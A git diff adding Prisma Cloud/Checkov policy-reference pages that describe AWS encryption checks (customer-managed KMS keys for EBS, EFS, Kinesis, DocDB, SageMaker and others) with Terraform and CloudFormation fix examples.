setting] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py[CKV_AWS_133] +|LOW + + +|xref:ensure-that-redshift-cluster-is-encrypted-by-kms.adoc[AWS Redshift Cluster not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py[CKV_AWS_142] +|MEDIUM + + +|xref:ensure-that-redshift-clusters-allow-version-upgrade-by-default.adoc[Redshift clusters version upgrade is not default] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py[CKV_AWS_141] +|LOW + + +|xref:ensure-that-s3-bucket-has-cross-region-replication-enabled.adoc[S3 bucket cross-region replication disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AWS_144] +|LOW + + +|xref:ensure-that-s3-bucket-has-lock-configuration-enabled-by-default.adoc[S3 bucket lock configuration disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py[CKV_AWS_143] +|LOW + + +|xref:ensure-that-s3-buckets-are-encrypted-with-kms-by-default.adoc[S3 buckets are not encrypted with KMS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AWS_145] +|LOW + +|xref:ensure-that-secrets-manager-secret-is-encrypted-using-kms.adoc[AWS Secrets Manager secret is not encrypted using KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py[CKV_AWS_149] +|MEDIUM + + +|xref:ensure-that-timestream-database-is-encrypted-with-kms-cmk.adoc[Timestream database is not encrypted with KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py[CKV_AWS_160] +|MEDIUM + + +|xref:ensure-that-workspace-root-volumes-are-encrypted.adoc[Workspace root volumes are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py[CKV_AWS_156] +|MEDIUM + + +|xref:ensure-that-workspace-user-volumes-are-encrypted.adoc[Workspace user volumes are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py[CKV_AWS_155] +|MEDIUM + + +|xref:general-10.adoc[AWS ElastiCache Redis cluster with in-transit encryption disabled (Replication group)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py[CKV_AWS_30] +|MEDIUM + + +|xref:general-11.adoc[AWS ElastiCache Redis cluster with Redis AUTH feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py[CKV_AWS_31] +|MEDIUM + + +|xref:general-13.adoc[EBS volumes do not have encrypted launch configurations] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py[CKV_AWS_8] +|HIGH + + +|xref:general-14.adoc[AWS SageMaker notebook instance not configured with data encryption at rest using KMS key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py[CKV_AWS_22] +|HIGH + + +|xref:general-15.adoc[AWS SNS topic has SSE disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py[CKV_AWS_26] +|MEDIUM + + +|xref:general-16-encrypt-sqs-queue.adoc[AWS SQS Queue not configured with server side encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py[CKV_AWS_27] +|MEDIUM + + +|xref:general-17.adoc[AWS Elastic File System (EFS) with encryption for data at rest is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py[CKV_AWS_42] +|MEDIUM + + +|xref:general-18.adoc[Neptune storage is not securely encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py[CKV_AWS_44] +|MEDIUM + + +|xref:general-25.adoc[AWS Redshift instances are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py[CKV_AWS_64] +|HIGH + + +|xref:general-3-encrypt-ebs-volume.adoc[AWS EBS volumes are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSEncryption.py[CKV_AWS_3] +|HIGH + + +|xref:general-4.adoc[AWS RDS DB cluster encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEncryption.py[CKV_AWS_16] +|MEDIUM + + +|xref:general-6.adoc[DynamoDB PITR is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamodbRecovery.py[CKV_AWS_28] +|HIGH + +|xref:general-7.adoc[Not all data stored in the EBS snapshot is securely encrypted] +|[CKV_AWS_CUSTOM_3] +|MEDIUM + + +|xref:general-73.adoc[RDS instances do not have Multi-AZ enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py[CKV_AWS_157] +|LOW + + +|xref:general-8.adoc[ECR image scan on push is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py[CKV_AWS_163] +|HIGH + + +|xref:general-9.adoc[AWS ElastiCache Redis cluster with encryption for data at rest disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py[CKV_AWS_29] +|MEDIUM + +|xref:ensure-provisioned-resources-are-not-manually-modified.adoc[AWS provisioned resources are manually modified] +|Not Supported +|HIGH + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100.adoc new file mode 100644 index 000000000..40f63d572 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100.adoc @@ -0,0 +1,73 @@ +== AWS Image Builder component not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 60691c7d-48b5-4b19-8d4f-201f2a2d43b8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py[CKV_AWS_180] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that Image builder component is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the component. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_imagebuilder_component +* *Attribute:* kms_key_id - (Optional) Amazon Resource Name (ARN) of the Key Management Service (KMS) Key used to encrypt the component. + + +[source,go] +---- +{ + "resource "aws_imagebuilder_component" "example" { + data = yamlencode({ + phases = [{ + name = "build" + steps = [{ + action = "ExecuteBash" + inputs = { + commands = ["echo 'hello world'"] + } + + name = "example" + onFailure = "Continue" + }] + + }] + schemaVersion = 1.0 + }) + + name = "example" + platform = "Linux" + version = "1.0.0" + kms_key_id = "ckv_kms" +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101.adoc new file mode 100644 index 000000000..d12db370c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101.adoc @@ -0,0 +1,64 @@ +== AWS S3 Object Copy not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 506e2eb5-671a-4282-9c32-746d4f0abe4e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py[CKV_AWS_181] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that the S3 Object Copy is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the cluster. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_object_copy +* *Attribute:* kms_key_id - (Optional) Specifies the AWS KMS Key ARN to use for object encryption. +This value is a fully qualified ARN of the KMS Key. + + +[source,go] +---- +{ + "resource "aws_s3_object_copy" "test" { + bucket = "destination_bucket" + key = "destination_key" + source = "source_bucket/source_key" ++ kms_key_id = "aws_kms_key.foo.arn" + + + grant { + uri = "http://acs.amazonaws.com/groups/global/AllUsers" + type = "Group" + permissions = ["READ"] + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102.adoc new file mode 100644 index 000000000..d15b94479 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102.adoc @@ -0,0 +1,57 @@ +== AWS Doc DB not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 49040160-0201-47a2-aa6e-4a6e3202d45a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py[CKV_AWS_182] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that the DocDB is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the cluster. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster +* *Arguments:* kms_key_id - (Optional) The ARN for the KMS encryption key. +When specifying kms_key_id, storage_encrypted needs to be set to true. + + +[source,go] +---- +resource "aws_docdb_cluster" "docdb" { + cluster_identifier = "my-docdb-cluster" + engine = "docdb" + master_username = "foo" + master_password = "mustbeeightchars" + backup_retention_period = 5 + preferred_backup_window = "07:00-09:00" + skip_final_snapshot = true ++ kms_key_id = "ckv_kms" +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103.adoc new file mode 100644 index 000000000..6c60f0d89 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103.adoc @@ -0,0 +1,54 @@ +== AWS EBS Snapshot Copy not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0de4c4c3-9fca-4cff-9c0f-e2bcd220868e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py[CKV_AWS_183] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that the EBS Snapshot copy is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the snapshot. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ebs_snapshot_copy +* *Attribute:* kms_key_id - The ARN for the KMS encryption key. + + +[source,go] +---- +resource "aws_ebs_snapshot_copy" "example_copy" { + source_snapshot_id = aws_ebs_snapshot.example_snapshot.id + source_region = "us-west-2" + + kms_key_id = "ckv_kms" + tags = { + Name = "HelloWorld_copy_snap" + } +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104.adoc new file mode 100644 index 000000000..cc4ec1d6a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104.adoc @@ -0,0 +1,99 @@ +== AWS Elastic File System (EFS) is not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e6c0b945-77de-490c-adb8-d085a445550d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py[CKV_AWS_184] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Elastic File Systems (EFSs) which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your EFS data. +It gives you full control over the encrypted data. + +//// +=== Fix - Runtime + + +AWS Console + + +AWS EFS Encryption of data at rest can only be enabled during file system creation. +So to resolve this alert, create a new EFS with encryption enabled with the customer-managed key, then migrate all required data from the reported EFS to this newly created EFS and delete reported EFS. +To create new EFS with encryption enabled, perform the following: + +. Sign into the AWS console + +. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated + +. Navigate to EFS dashboard + +. Click on 'File systems' (Left Panel) + +. Click on 'Create file system' button + +. On the 'Configure file system access' step, specify EFS details as per your requirements and Click on 'Next Step' + +. On the 'Configure optional settings' step, Under 'Enable encryption' Choose 'Enable encryption of data at rest' and Select customer managed key [i.e. ++ +Other than (default)aws/elasticfilesystem] from 'Select KMS master key' dropdown list along with other parameters and Click on 'Next Step' + +. On the 'Review and create' step, Review all your setting and Click on 'Create File System' button ++ +To delete reported EFS which does not has encryption, perform the following: + +. Sign into the AWS console + +. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated + +. Navigate to EFS dashboard + +. Click on 'File systems' (Left Panel) + +. Select the reported file system + +. Click on 'Actions' drop-down + +. Click on 'Delete file system' + +. In the 'Permanently delete file system' popup box, To confirm the deletion enter the file system's ID and Click on 'Delete File System +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_efs_file_system +* *Arguments:* encrypted + + +[source,go] +---- +resource "aws_efs_file_system" "enabled" { + creation_token = "example" + kms_key_id = +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105.adoc new file mode 100644 index 000000000..010608611 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105.adoc @@ -0,0 +1,77 @@ +== AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1c49c569-2e69-4f8d-a2cf-9d5e9123109b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py[CKV_AWS_185] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the AWS Kinesis streams which are encrypted with default KMS keys and not with Master Keys managed by Customer. +It is a best practice to use customer managed Master Keys to encrypt your Amazon Kinesis streams data. +It gives you full control over the encrypted data. + +//// +=== Fix - Runtime + + +AWS Console + + + +. Sign in to the AWS Console + +. Go to Kinesis Service + +. Select the reported Kinesis data stream for the corresponding region + +. Under Server-side encryption, Click on Edit + +. Choose Enabled + +. Under KMS master key, You can choose any KMS other than the default (Default) aws/kinesis + +. Click Save +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_kinesis_stream +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "aws_kinesis_stream" "pass" { + ... + kms_key_id = aws_kms_key.sse_aws_kms_key_id.id +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106.adoc new file mode 100644 index 000000000..5d2e22e5a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106.adoc @@ -0,0 +1,62 @@ +== AWS S3 bucket Object not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5d5127c5-9ff5-4c17-b26e-114650e4a20f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py[CKV_AWS_186] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This is a simple check to ensure that the S3 bucket Object is using AWS key management - KMS to encrypt its contents. +To resolve add the ARN of your KMS or link on creation of the object. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket_object +* *Attribute:* kms_key_id - (Optional) Specifies the AWS KMS Key ARN to use for object encryption. +This value is a fully qualified ARN of the KMS Key. + + +[source,go] +---- +{ + "resource "aws_s3_bucket_object" "object" { + bucket = "your_bucket_name" + key = "new_object_key" + source = "path/to/file" ++ kms_key_id = "ckv_kms" + + # The filemd5() function is available in Terraform 0.11.12 and later + # For Terraform 0.11.11 and earlier, use the md5() function and the file() function: + # etag = "${md5(file("path/to/file"))}" + etag = filemd5("path/to/file") +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107.adoc new file mode 100644 index 000000000..69483f366 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107.adoc @@ -0,0 +1,62 @@ +== AWS Sagemaker domain not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1414b690-a442-4a9c-9f59-91a507b42228 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py[CKV_AWS_187] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon SageMaker Feature Store enables you to create two types of stores: an online store or offline store. +The online store is used for low latency real-time inference use cases whereas the offline store is used for training and batch inference use cases. +When you create a feature group for online or offline use you can provide a AWS Key Management Service customer managed key to encrypt all your data at rest. +In case you do not provide a AWS KMS key then we ensure that your data is encrypted on the server side using an AWS owned AWS KMS key or AWS managed AWS KMS key. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sagemaker_domain +* *Arguments:* kms_key_id - (Optional) The AWS KMS customer managed CMK used to encrypt the EFS volume attached to the domain. + + +[source,go] +---- +{ + "resource "aws_sagemaker_domain" "example" { + domain_name = "example" + auth_mode = "IAM" + vpc_id = aws_vpc.test.id + subnet_ids = [aws_subnet.test.id] + + kms_key_id = "ckv_kms" + default_user_settings { + execution_role = aws_iam_role.test.arn + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109.adoc new file mode 100644 index 000000000..aec2daeff --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109.adoc @@ -0,0 +1,64 @@ +== AWS EBS Volume not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6fdb8007-7c47-4ff5-a95e-ef33c6bda476 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py[CKV_AWS_189] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon EBS automatically creates a unique AWS managed key in each Region where you store AWS resources. +This KMS key has the alias alias/aws/ebs. +By default, Amazon EBS uses this KMS key for encryption. +Alternatively, you can specify a symmetric customer managed key that you created as the default KMS key for EBS encryption. +Using your own KMS key gives you more flexibility, including the ability to create, rotate, and disable KMS keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ebs_volume +* *Attribute:* kms_key_id - (Optional) The ARN for the KMS encryption key. +When specifying kms_key_id, encrypted needs to be set to true. + +NOTE: Terraform must be running with credentials which have the GenerateDataKeyWithoutPlaintext permission on the specified KMS key as required by the EBS KMS CMK volume provisioning process to prevent a volume from being created and almost immediately deleted. + + +[source,go] +---- +{ + "resource "aws_ebs_volume" "example" { + availability_zone = "us-west-2a" + size = 40 ++ kms_key_id = "ckv_kms" + tags = { + Name = "HelloWorld" + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110.adoc new file mode 100644 index 000000000..7f4de1bf1 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110.adoc @@ -0,0 +1,63 @@ +== AWS lustre file system not configured with CMK key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db822ebc-4618-4d2d-9ea0-e813bf4912a4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py[CKV_AWS_190] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon FSx for Lustre uses a KMS key, either the AWS managed key for Amazon FSx or a custom KMS key, to encrypt and decrypt file system data. +All scratch FSx for Lustre file systems are encrypted at rest with keys managed by the service. +Data is encrypted using an XTS-AES-256 block cipher. +Data is automatically encrypted before being written to the file system, and is automatically decrypted as it is read. +The keys used to encrypt scratch file systems at-rest are unique per file system and destroyed after the file system is deleted. +For persistent file systems, you choose the KMS key used to encrypt and decrypt data, either the AWS managed key for Amazon FSx or a custom KMS key. +You specify which key to use when you create a persistent file system. +You can enable, disable, or revoke grants on this KMS key. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_fsx_windows_file_system +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "aws_fsx_windows_file_system" "example" { + active_directory_id = aws_directory_service_directory.example.id + kms_key_id = aws_kms_key.example.arn + storage_capacity = 300 + subnet_ids = [aws_subnet.example.id] + throughput_capacity = 1024 +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111.adoc new file mode 100644 index 000000000..d00dd5b9a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111.adoc @@ -0,0 +1,68 @@ +== AWS Elasticache replication group not configured with CMK key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| af6fb536-8fb7-4b60-a116-7fd9c5d5fd48 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py[CKV_AWS_191] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +ElastiCache for Redis offers default (service managed) encryption at rest, as well as ability to use your own symmetric customer managed AWS KMS keys in AWS Key Management Service (KMS). +Data stored on SSDs (solid-state drives) in data tiering enabled clusters is always encrypted by default. +However, when the cluster is backed up, the snapshot data is not automatically encrypted. +Encryption needs to be enabled on the snapshot. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elasticache_replication_group +* *Attribute:* kms_key_id - (Optional) The ARN of the key that you wish to use if encrypting at rest. +If not supplied, uses service managed encryption. +Can be specified only if at_rest_encryption_enabled = true. + + +[source,go] +---- +{ + "resource "aws_elasticache_replication_group" "example" { + automatic_failover_enabled = true + availability_zones = ["us-west-2a", "us-west-2b"] + replication_group_id = "tf-rep-group-1" + replication_group_description = "test description" + node_type = "cache.m4.large" + number_cache_clusters = 2 + parameter_group_name = "default.redis3.2" + port = 6379 + + + + kms_key_id = "arm:ckv" + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22.adoc new file mode 100644 index 000000000..853be033c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22.adoc @@ -0,0 +1,138 @@ + +== AWS Kinesis streaming data unencrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8fd3611b-3298-483c-a1ec-0df3fc1ded8d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py[CKV_AWS_43] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Kinesis Data Firehose is a streaming data pipeline service that can route messages to destinations such as S3, Redshift Elasticsearch and others. +It can also be used to transform data properties before streaming to a defined destination. +Kinesis provides server-side data encryption to protect sensitive information contained in the data stream. +We recommend you ensure that your Kinesis streams are encrypted using server-side encryption (SSE). + +//// +=== Fix - Runtime + + +AWS Console + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Select Services and search for Kinesis. + +. Under the Amazon Kinesis dashboard select Data Firehose from the left navigation panel. + +. Select the Firehose Delivery System that needs to be verified and click on the Name to access the delivery stream. + +. Select the Details tab and scroll down to Amazon S3 destination. ++ +Check the Encryption value and if it's set to Disabled then the selected Firehose Delivery System data is not encrypted. + +. Repeat steps 4 and 5 to verify another Firehose Delivery System. + +. To enable the Encryption on selected Firehose Delivery System click on the Name to access the delivery stream. ++ +Under the Details tab, click Edit to make the changes in Amazon S3 destination. + +. Click Enable next to the S3 encryption to enable the encryption. + +. Select the KMS master key from the dropdown list. ++ +Select the (Default( aws/s3 )) KMS key or an AWS KMS Customer Master Key (CMK). + +. Click Save. ++ +A Successfully Updated message appears. + + +CLI Command + + +Enables or updates server-side encryption using an AWS KMS key for a specified stream. + + +[source,shell] +---- +{ + "aws kinesis start-stream-encryption \\ + --encryption-type KMS \\ + --key-id arn:aws:kms:us-west-2:012345678912:key/a3c4a7cd-728b-45dd-b334-4d3eb496e452 \\ + --stream-name samplestream", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_kinesis_stream +* *Arguments:* encryption_type - (Optional) The encryption type to use. + +The only acceptable values are NONE or KMS. +The default value is NONE. +kms_key_id - (Optional) The GUID for the customer-managed KMS key to use for encryption. +You can also use a Kinesis-owned master key by specifying the alias alias/aws/kinesis. + + +[source,go] +---- + +resource "aws_kinesis_stream" "test_stream" { + ... + name = "terraform-kinesis-test" + + encryption_type = KMS + + kms_key_id = + ... + } +---- + + +*CloudFormation* + + +* *Resource:* AWS::Kinesis::Stream +* *Arguments:* Properties.StreamEncryption.EncryptionType + + +[source,yaml] +---- +Resources: + KMSEncryption: + Type: AWS::Kinesis::Stream + Properties: + ... + StreamEncryption: + ... + EncryptionType: KMS +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23.adoc new file mode 100644 index 000000000..b3dac305d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23.adoc @@ -0,0 +1,123 @@ + +== AWS Amazon Kinesis Data Firehose (DAX) not encrypted at rest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e8980325-125e-4bcd-a0c8-68838ddab811 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DAXEncryption.py[CKV_AWS_47] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS DAX encryption at rest provides an additional layer of data protection, helping secure your data from unauthorized access to underlying storage. Without encryption, anyone with access to the storage media or the network traffic between the DAX cluster and the client could potentially intercept and view the data. We recommend enabling encryption at rest. + +NOTE: With encryption at rest, the data persisted by DAX on disk is encrypted using 256-bit Advanced Encryption Standard (AES-256). + +//// +=== Fix - Runtime + + +AWS Console + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/dynamodb/ [Amazon DynamoDB console]. + +. In the navigation pane on the left side of the console, under DAX, select Clusters. + +. Click Create Cluster. + +. For Cluster name, enter a short name for your cluster. ++ +Select the node type for all of the nodes in the cluster, and for the cluster size, use 3 nodes. + +. In Encryption, make sure that Enable encryption is selected. ++ +7 After selecting the IAM role, subnet group, security groups, and cluster settings, select Launch cluster. + + +CLI Command + + +To creates a DAX cluster: + + +[source,shell] +---- +{ + "aws dax create-cluster \\ + --cluster-name daxcluster \\ + --node-type dax.r4.large \\ + --replication-factor 3 \\ + --iam-role-arn roleARN \\ + --sse-specification Enabled=true", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_dax_cluster +* *Arguments:* server_side_encryption - (Optional) Encrypt at rest options, enabled/disabled. + + +[source,go] +---- +{ + "resource "aws_dax_cluster" "example" { + ... + cluster_name = "cluster-example" ++ server_side_encryption = enabled + ... +}", +} +---- + + 